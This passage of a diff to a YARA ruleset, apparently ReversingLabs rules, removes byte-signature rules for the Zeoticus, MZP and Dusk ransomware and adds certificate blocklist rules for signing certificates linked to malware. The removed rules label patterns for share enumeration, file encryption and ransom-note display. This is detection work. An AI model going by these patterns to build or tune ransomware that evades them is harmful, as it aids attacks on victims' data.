-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Zeoticus.yara#L1-L90"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "adf42b96139ad98f4253f3eba2c4af1be9545825605e0851185cc15284d9e9a0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13948-L13964"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c48207907339ce3fb7b6bc630097761a24495a9d4e69d421f2bdb36ddc92abcb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Zeoticus"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_shares_p1 = {
-            53 55 8B 2D ?? ?? ?? ?? 8B C1 56 57 8B 3D ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51
-            8D 4C 24 ?? 51 6A ?? 8D 4C 24 ?? 51 6A ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 74
-            ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 89 5C 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 33 F6 39 73 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? FF 33 8D 44 24
-            ?? FF 74 24 ?? 68 ?? ?? ?? ?? 50 FF D7 A1 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51
-        }
-		$enum_shares_p2 = {
-            50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 56 FF 34
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 56 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ??
-            ?? ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 FF 85 C0 7E ?? 8D
-            5F ?? 8D 44 24 ?? 50 FF 34 BD ?? ?? ?? ?? FF D5 85 C0 0F 44 F3 47 3B 3D ?? ?? ?? ??
-            7C ?? 8B 5C 24 ?? 85 F6 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ??
-            ?? ?? 8B 3D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 50 FF D7
-            A1 ?? ?? ?? ?? 83 C4 ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 6A ?? FF 34 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ??
-            ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ?? 83
-            C3 ?? 46 89 5C 24 ?? 89 74 24 ?? 3B 74 24 ?? 0F 82 ?? ?? ?? ?? 8B 5C 24 ?? 53 FF 15
-            ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4
-            ?? ?? ?? ?? C3
-        }
-		$encrypt_files = {
-            68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ??
-            ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ??
-            83 C4 ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 83
-            C4 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D
-            04 45 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ??
-            FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 83 FB ?? 75 ?? E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
-            56 6A ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 E8 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? 51 E8 ?? ?? ??
-            ?? 83 C4 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8
-        }
-		$find_files = {
-            81 EC ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 01
-            83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ?? ?? 56 8D 71 ?? 0F 85 ?? ?? ?? ??
-            55 8B 2D ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 66 90 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ??
-            66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 74
-            ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4C 74 ?? 85 C0 74 ?? 33 F6 90
-            FF 34 B5 ?? ?? ?? ?? FF D7 83 F8 ?? 74 ?? 46 83 FE ?? 72 ?? 8D 44 24 ?? 50 FF 34 B5
-            ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D
-            4C 24 ?? 8D 51 ?? 66 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ??
-            ?? 8D 71 ?? 0F 84 ?? ?? ?? ?? 5F 5D 53 FF 15 ?? ?? ?? ?? 5E 5B 81 C4 ?? ?? ?? ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "46:2b:aa:da:57:57:0f:70:df:76:d1:0b:9e:7b:f2:b7" and 1551744000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_83320D93Dd8Cf16D11F99B1078B0A7Cb : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "12ce9be9-4644-5b59-aed2-ce4b04fcc46a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13966-L13984"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "94ec5e05357767cc0c4cd1fc8ff6d1a366359ba699c43f3710204d761e7e707f"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $enum_shares_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb" or pe.signatures [ i ] . serial == "83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb" ) and 1524614400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_MZP : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_10Bae1D20Cb4Cc36A0Ffac86 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MZP ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c08a4080-fa26-5b7b-869d-5f59096b1a12"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "a07d1c35-0026-526a-bf08-e6b07008da03"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.MZP.yara#L1-L147"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "724ae1033bfb8ff494b30e6b3333e6c848375f1b001b75e71c9444c9f9f31251"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13986-L14002"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "44e91fbf4da8e81859a21408ee9f1971f1e8f48d22553fcaa6469156d4a0670b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "MZP"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$show_ransom_note_p1 = {
-            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 53 56 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ??
-            ?? 88 55 ?? 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C3 E8 ?? ?? ??
-            ?? 89 1D ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 33 C0
-            89 46 ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ??
-            6A ?? 6A ?? 8D 45 ?? 50 33 C9 B2 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8D 86 ??
-            ?? ?? ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ??
-            C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ??
-            ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ??
-            ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ??
-            ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8
-            ?? ?? ?? ?? B2 ?? 8B C6 E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 8B 00 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 33 D2 8B C6 E8
-        }
-		$show_ransom_note_p2 = {
-            C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ??
-            ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ??
-            ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? B2
-            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C6 46 ?? ?? C6 46 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? C6 46
-            ?? ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            F0 89 73 ?? BA ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0
-            8D 46 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8B C6 C6
-            40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73
-            ?? 8B C6 C6 40 ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 43 ?? 8B 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 46 ?? 33 D2 E8 ?? ?? ??
-            ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? C6 46 ?? ?? 8D 46 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 43 ?? B2 ?? A1 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 89 43 ?? 8B 73 ?? 8D 46 ?? 33 D2 E8 ?? ?? ?? ?? 8D 46 ?? BA ?? ?? ??
-            ?? E8
-        }
-		$search_config_file = {
-            8B C0 53 56 8B F0 8A 9E ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 75 ??
-            8B 46 ?? 8B 48 ?? A1 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 D2 8B
-            86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 83 BE ?? ?? ?? ?? ?? 74 ?? 8B 96 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ??
-            EB ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 88 9E ?? ?? ?? ?? 8A 96 ?? ??
-            ?? ?? 8B C6 E8 ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 74 ?? 8B 46 ?? 8B 8E ?? ?? ?? ?? 8B
-            96 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8B 46 ?? E8 ?? ?? ?? ?? 8B 46 ?? 89
-            70 ?? 5E 5B C3
-        }
-		$track_mouse_event_for_entropy = {
-            53 56 83 C4 ?? 8B F0 8B 42 ?? 05 ?? ?? ?? ?? 83 E8 ?? 72 ?? 2D ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 8A 86 ?? ?? ?? ?? 88 44 24 ?? 66 83 BE ?? ?? ?? ?? ?? 74 ??
-            8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? 8B D8 EB ?? 54 E8 ?? ?? ?? ?? 8D 4C 24 ??
-            8B D4 8B C6 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8D 54 24 ??
-            8B C6 E8 ?? ?? ?? ?? 8D 54 24 ?? 8B C4 E8 ?? ?? ?? ?? 8B D8 3A 5C 24 ?? 0F 84 ?? ??
-            ?? ?? 8B C6 E8 ?? ?? ?? ?? 84 DB 74 ?? C6 86 ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ??
-            74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 8B 46 ?? 89 44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB
-            ?? C6 86 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 46 ?? 89
-            44 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ??
-            ?? ?? FF 96 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? EB ?? 80 BE ?? ?? ?? ?? ?? 74 ?? C6 86
-            ?? ?? ?? ?? ?? 66 83 BE ?? ?? ?? ?? ?? 74 ?? 8B D6 8B 86 ?? ?? ?? ?? FF 96 ?? ?? ??
-            ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 5E 5B C3
-        }
-		$find_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B FA
-            8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? 8D 85 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 33 C9 8A 08 41 E8
-            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ??
-            ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 43 ?? E9 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 53 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? FF 43
-        }
-		$find_files_p2 = {
-            80 7B ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D7 8B C3 E8 ?? ?? ?? ?? EB ?? 80 7B ?? ?? 74 ?? 8D
-            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 43 ?? E8 ?? ?? ?? ?? EB ??
-            8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            8D 43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files = {
-            8B C0 33 D2 89 50 ?? 89 50 ?? 52 8D 50 ?? 52 FF 70 ?? FF 70 ?? FF 30 E8 ?? ?? ?? ??
-            85 C0 74 ?? 33 C0 C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? C3 33 C0 C3 51 8B 50 ?? 85 D2 7E
-            ?? 33 C9 89 48 ?? 51 8D 4C 24 ?? 51 52 FF 70 ?? FF 30 E8 ?? ?? ?? ?? 85 C0 74 ?? 33
-            C0 59 C3 E8 ?? ?? ?? ?? EB ?? FF 30 C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 75 ?? C3
-            E8 ?? ?? ?? ?? C3 56 8B F0 33 C0 89 46 ?? 89 46 ?? 8B 46 ?? 2D ?? ?? ?? ?? 74 ?? 48
-            74 ?? 48 74 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ??
-            ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ??
-            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ??
-            ?? ?? ?? 80 7E ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 52 50 8D 46 ??
-            50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 06 81 7E ?? ?? ?? ?? ?? 0F 85 ?? ??
-            ?? ?? FF 4E ?? 6A ?? FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 2D ?? ?? ?? ?? 73 ??
-            33 C0 6A ?? 6A ?? 50 FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 6A ?? 8B D4 6A ?? 52
-            68 ?? ?? ?? ?? 8D 96 ?? ?? ?? ?? 52 FF 36 E8 ?? ?? ?? ?? 5A 48 0F 85 ?? ?? ?? ?? 33
-            C0 3B C2 73 ?? 80 BC 06 ?? ?? ?? ?? ?? 74 ?? 40 EB ?? 6A ?? 6A ?? 2B C2 50 FF 36 E8
-            ?? ?? ?? ?? 40 74 ?? FF 36 E8 ?? ?? ?? ?? 48 75 ?? EB ?? C7 46 ?? ?? ?? ?? ?? 81 7E
-            ?? ?? ?? ?? ?? 74 ?? 6A ?? EB ?? 6A ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 06 81 7E ??
-            ?? ?? ?? ?? 74 ?? FF 36 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 F8 ?? 75 ?? C7 46 ?? ?? ?? ??
-            ?? 33 C0 5E C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "10:ba:e1:d2:0c:b4:cc:36:a0:ff:ac:86" and 1476773830 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_230716Bfe915Dd6203B2E2A35674C2Ee : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "849c390e-f81f-558e-88a3-19242c127a56"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14004-L14020"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0197ff46ceb1017488da4383436fd0ddc375904f36cc16c5a8ef21d633ec387c"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_config_file ) and ( all of ( $find_files_p* ) ) and ( $track_mouse_event_for_entropy ) and ( $encrypt_files ) and ( all of ( $show_ransom_note_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "23:07:16:bf:e9:15:dd:62:03:b2:e2:a3:56:74:c2:ee" and 1472169600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Dusk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_36A77D37E68E02Fd3D043C7197E044Ca : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Dusk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cde30f40-f13c-53da-8656-cc293433aa36"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "721e48fb-3046-5b2d-8ad9-ae340e598794"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Dusk.yara#L1-L73"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b6b0b3be7c17115dc5f225a13228f8a4811d84ae095c3ceba2d89f569f2d40c7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14022-L14038"
